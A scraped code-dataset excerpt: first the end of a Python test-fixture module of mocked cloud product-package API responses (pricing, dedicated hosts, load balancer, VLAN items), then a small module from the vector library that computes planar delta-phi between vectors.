'setupFee': '0.1',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}}
]
getItemPricesISCSI = [
{
'currentPriceFlag': '',
'id': 2152,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 46626,
'itemPriceId': 2152, 'packageId': 0}],
'quantity': '',
'recurringFee': '.35',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22501,
'item': {'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{
'id': 252983,
'itemPriceId': 22501, 'packageId': 0
}],
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22441,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547
},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 250326,
'itemPriceId': 22441, 'packageId': 0}],
'quantity': '',
'recurringFee': '15',
'setupFee': '0',
'sort': 0
}]
getItemsVS = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
}
]
verifyOrderDH = {
'preTaxSetup': '0',
'storageGroups': [],
'postTaxRecurring': '3.164',
'billingOrderItemId': '',
'presetId': '',
'hardware': [
{
'domain': 't.com',
'hostname': 't',
'bareMetalInstanceFlag': '',
'hardwareStatusId': '',
'primaryBackendNetworkComponent': {
'router': {
'id': 51218
},
'networkVlanId': ''
},
'accountId': ''
}
],
'prices': [
{
'itemId': 10195,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '3.164',
'oneTimeFee': '0',
'id': 200269,
'item': {
'thirdPartyPolicyAssignments': [],
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'bundle': [
{
'category': {
'categoryCode': 'dedicated_host_ram',
'id': 850,
'name': 'Dedicated Host RAM'
},
'itemPriceId': 200301,
'itemPrice': {
'itemId': 10199,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200301,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41763
},
{
'category': {
'categoryCode': 'dedicated_host_disk',
'id': 851,
'name': 'Dedicated Host Disk'
},
'itemPriceId': 200299,
'itemPrice': {
'itemId': 10197,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200299,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41761
}
],
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'units': 'CORE',
'id': 10195
},
'laborFee': '0',
'categories': [
{
'categoryCode': 'dedicated_virtual_hosts',
'id': 848,
'name': 'Dedicated Host'
}
]
}
],
'sendQuoteEmailFlag': '',
'packageId': 813,
'useHourlyPricing': True,
'preTaxRecurringMonthly': '0',
'message': '',
'preTaxRecurring': '3.164',
'primaryDiskPartitionId': '',
'locationObject': {
'id': 138124,
'name': 'dal05',
'longName': 'Dallas 5'
},
'taxCompletedFlag': False,
'isManagedOrder': '',
'imageTemplateId': '',
'postTaxRecurringMonthly': '0',
'resourceGroupTemplateId': '',
'postTaxSetup': '0',
'sshKeys': [],
'location': '138124',
'stepId': '',
'proratedInitialCharge': '0',
'totalRecurringTax': '0',
'paymentType': '',
'resourceGroupId': '',
'sourceVirtualGuestId': '',
'bigDataOrderFlag': False,
'extendedHardwareTesting': '',
'preTaxRecurringHourly': '3.164',
'postTaxRecurringHourly': '3.164',
'currencyShortName': 'USD',
'containerSplHash': '000000003699c54000007f38ef8b0102',
'proratedOrderTotal': '0',
'serverCoreCount': '',
'privateCloudOrderFlag': False,
'totalSetupTax': '0',
'quantity': 1
}
# Item fixtures for the Load Balancer as a Service (LBaaS) product package:
# the base service item plus the metered "uptime" item. The uptime price's
# locationGroupId 507 matches the id-507 pricing group in regionsLoadbal.
itemsLoadbal = [
    {
        "capacity": "0",
        "description": "Load Balancer as a Service",
        "id": 10043,
        "keyName": "LOAD_BALANCER_AS_A_SERVICE",
        "itemCategory": {
            "categoryCode": "load_balancer_as_a_service",
            "id": 1116,
            "name": "Load Balancer As A Service",
        },
        "prices": [
            {
                "hourlyRecurringFee": "0",
                "id": 199447,
                "locationGroupId": '',
                "recurringFee": "0",
            }
        ]
    },
    {
        "capacity": "0",
        "description": "Load Balancer Uptime",
        "id": 10785,
        "keyName": "LOAD_BALANCER_UPTIME",
        "itemCategory": {
            "categoryCode": "load_balancer_uptime",
            "id": 1119,
            "name": "Load Balancer Uptime",
        },
        "prices": [
            {
                "hourlyRecurringFee": ".028",
                "id": 205913,
                "locationGroupId": 507,
            }]}
]
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01',
"groups": [
{
"description": "Location Group 4",
"id": 507,
"locationGroupTypeId": 82,
"name": "Location Group 4",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Cross Region - EU",
"id": 1303,
"locationGroupTypeId": 82,
"name": "eu",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Regional Frankfurt",
"id": 1783,
"locationGroupTypeId": 82,
"name": "eu-de",
"locationGroupType": {
"name": "PRICING"
}
}
]
}},
'sortOrder': 10}]
# Product_Package::getAllObjects response for the LBaaS package (id 805),
# assembled from the itemsLoadbal and regionsLoadbal fixtures defined above.
getAllObjectsLoadbal = [
    {
        "id": 805,
        "keyName": "LBAAS",
        "name": "Load Balancer As A Service (LBaaS)",
        "items": itemsLoadbal,
        "regions": regionsLoadbal
    }
]
getAllObjectsDH = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores X 242 RAM X 1.2 TB",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "242_GB_RAM",
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_242_RAM_X_1_4_TB",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getAllObjectsDHGpu = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getRegions = [{
"description": "WDC07 - Washington, DC",
"keyname": "WASHINGTON07",
"location": {
"locationId": 2017603,
"location": {
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"priceGroups": [
{
"description": "COS Regional - US East",
"id": 1305,
"locationGroupTypeId": 82,
"name": "us-east",
"locationGroupType": {
"name": "PRICING"
}
}
]
}
},
"locations": [{
"location": {
"euCompliantFlag": False,
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"statusId": 2},
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 2017603,
"packageId": 46
}]
}]
}]
getItemPrices = [
{
"hourlyRecurringFee": ".093",
"id": 204015,
"recurringFee": "62",
"categories": [
{
"categoryCode": "guest_core"
}
],
"item": {
"description": "4 x 2.0 GHz or higher Cores",
"id": 859,
"keyName": "GUEST_CORES_4",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2,
"regions": [
{
"description": "MON01 - Montreal",
"keyname": "MONTREAL",
"sortOrder": 94
}
]
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2,
"regions": [
{
"description": "AMS02 POP - Amsterdam",
"keyname": "AMSTERDAM02",
"sortOrder": 12
}
]
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".006",
"id": 204663,
"recurringFee": "4.1",
"item": {
"description": "100 GB (LOCAL)",
"id": 3899,
"keyName": "GUEST_DISK_100_GB_LOCAL_3",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".217",
"id": 204255,
"recurringFee": "144",
"item": {
"description": "16 GB ",
"id": 1017,
"keyName": "RAM_16_GB",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
}
]
getActivePresets = [
{
"description": "M1.64x512x25",
"id": 799,
"isActive": "1",
"keyName": "M1_64X512X25",
"name": "M1.64x512x25",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 258963,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
},
{
"description": "M1.56x448x100",
"id": 797,
"isActive": "1",
"keyName": "M1_56X448X100",
"name": "M1.56x448x100",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 698563,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
},
{
"description": "M1.64x512x100",
"id": 801,
"isActive": "1",
"keyName": "M1_64X512X100",
"name": "M1.64x512x100",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 963258,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
}
]
# No account-restricted presets in the test account.
getAccountRestrictedActivePresets = []
# Minimal reserved-capacity group fixture (id only).
RESERVED_CAPACITY = [{"id": 1059}]
getItems_RESERVED_CAPACITY = [
{
'id': 12273,
'keyName': 'B1_1X2_1_YEAR_TERM',
'description': 'B1 1x2 1 year term',
'capacity': 12,
'itemCategory': {
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '.032',
'id': 217561,
'itemId': 12273,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
}
]
}
]
}
]
getItems_1_IPV6_ADDRESS = [
{
'id': 4097,
'keyName': '1_IPV6_ADDRESS',
'itemCategory': {
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
'itemId': 4097,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
}
]
}
]
}
]
getObject = {
'id': 200,
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'accountRestrictedActivePresets': [],
'activePresets': [
{
'description': 'AC2.8x60x25',
'id': 861,
'isActive': '1',
'keyName': 'AC2_8X60X25',
'name': 'AC2.8x60x25',
'packageId': 835
},
{
'description': 'AC2.8x60x100',
'id': 863,
'isActive': '1',
'keyName': 'AC2_8X60X100',
'name': 'AC2.8x60x100',
'packageId': 835
}],
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}, {
"capacity": "2",
"description": "2 x 2.0 GHz or higher Cores",
"keyName": "GUEST_CORES_2",
"attributes": [
{
"id": 8261,
"attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
}
],
"itemCategory": {
"categoryCode": "guest_core",
"id": 80
}}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}]}
# Single software-license item fixture (VMware vSAN Enterprise tier) with one
# zero-fee price; locationGroupId None marks it as the standard/default price.
getItems_vmware = [{
    "capacity": "2",
    "description": "VMware vSAN Enterprise Tier III 65 - 124 TB 6.x",
    "id": 9567,
    "itemTaxCategoryId": 166,
    "keyName": "VMWARE_VSAN_ENTERPRISE_TIER_III_65_124_TB_6_X_2",
    "softwareDescriptionId": 1979,
    "units": "CPU",
    "itemCategory": {
        "categoryCode": "software_license",
        "id": 438,
        "name": "Software License",
        "quantityLimit": 1,
    },
    "prices": [
        {
            "id": 245164,
            "itemId": 9567,
            "laborFee": "0",
            "locationGroupId": None,
            "recurringFee": "0",
            "setupFee": "0",
            "sort": 0,
        }
    ]}]
getItemsVLAN = [{
"description": "Private Network Vlan",
"id": 1072,
"itemTaxCategoryId": 166,
"keyName": "PRIVATE_NETWORK_VLAN",
"itemCategory": {
"categoryCode": "network_vlan",
"id": 113,
"name": "Network Vlan"},
"prices": [{
"id": 203707,
"itemId": 1072,
"laborFee": "0",
"locationGroupId": 505,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
},
{
"id": 203727,
"itemId": 1072,
"laborFee": "0",
"locationGroupId": 545,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
}]
}, {
"description": "Public Network Vlan",
"id": 1071,
"itemTaxCategoryId": 166,
"keyName": "PUBLIC_NETWORK_VLAN",
"units": "N/A",
"itemCategory": {
"categoryCode": "network_vlan",
"id": 113,
"name": "Network Vlan",
},
"prices": [{
"id": 203637,
"itemId": 1071,
"laborFee": "0",
"locationGroupId": 509,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
},
{
"id": 203667,
"itemId": 1071,
"laborFee": "0",
"locationGroupId": 545,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
}]
}
]
| 33.0115 | 106 | 0.376496 |
70925828c12988cf7da84052c16ee31871c4d5d7 | 1,497 | py | Python | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2021, Jonas Eschle, Jim Pivarski, Eduardo Rodrigues, and Henry Schreiner.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/vector for details.
import numpy
from vector.compute.planar import phi
from vector.methods import (
AzimuthalRhoPhi,
AzimuthalXY,
_aztype,
_from_signature,
_handler,
_lib_of,
)
def rectify(lib, phi):
    """Wrap the angle *phi* into the half-open interval [-pi, pi).

    *lib* is the math backend (e.g. numpy or the math module) and only needs
    to provide ``pi`` and support the arithmetic operators used here.
    """
    half_turn = lib.pi
    full_turn = 2 * half_turn
    return (phi + half_turn) % full_turn - half_turn
def xy_xy(lib, x1, y1, x2, y2):
    """deltaphi for two vectors both given in x/y coordinates.

    Computes each azimuthal angle from its components, then wraps the
    difference into [-pi, pi).
    """
    angle1 = phi.xy(lib, x1, y1)
    angle2 = phi.xy(lib, x2, y2)
    return rectify(lib, angle1 - angle2)
def xy_rhophi(lib, x1, y1, rho2, phi2):
    """deltaphi where the first vector is x/y and the second is rho/phi.

    The second vector's phi is already available; rho2 is unused.
    """
    angle1 = phi.xy(lib, x1, y1)
    return rectify(lib, angle1 - phi2)
def rhophi_xy(lib, rho1, phi1, x2, y2):
    """deltaphi where the first vector is rho/phi and the second is x/y.

    The first vector's phi is already available; rho1 is unused.
    """
    angle2 = phi.xy(lib, x2, y2)
    return rectify(lib, phi1 - angle2)
def rhophi_rhophi(lib, rho1, phi1, rho2, phi2):
    """deltaphi for two rho/phi vectors; both rho components are unused."""
    difference = phi1 - phi2
    return rectify(lib, difference)
# Dispatch table keyed by the azimuthal coordinate types of the two operands.
# Each value is (compute function, scalar return type); deltaphi always yields
# a plain float angle regardless of the input representations.
dispatch_map = {
    (AzimuthalXY, AzimuthalXY): (xy_xy, float),
    (AzimuthalXY, AzimuthalRhoPhi): (xy_rhophi, float),
    (AzimuthalRhoPhi, AzimuthalXY): (rhophi_xy, float),
    (AzimuthalRhoPhi, AzimuthalRhoPhi): (rhophi_rhophi, float),
}
def dispatch(v1, v2):
    """Compute deltaphi(v1, v2) by dispatching on the operands' azimuthal types.

    Looks up the compute function for the pair of coordinate systems in
    ``dispatch_map``, evaluates it with numpy floating-point warnings
    suppressed, and wraps the raw result back into a vector-library scalar.
    """
    signature = (_aztype(v1), _aztype(v2))
    function, *returns = _from_signature(__name__, dispatch_map, signature)
    with numpy.errstate(all="ignore"):
        handler = _handler((v1, v2))
        raw = function(
            _lib_of((v1, v2)), *v1.azimuthal.elements, *v2.azimuthal.elements
        )
        return handler._wrap_result(raw, returns)
| 24.540984 | 94 | 0.639279 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.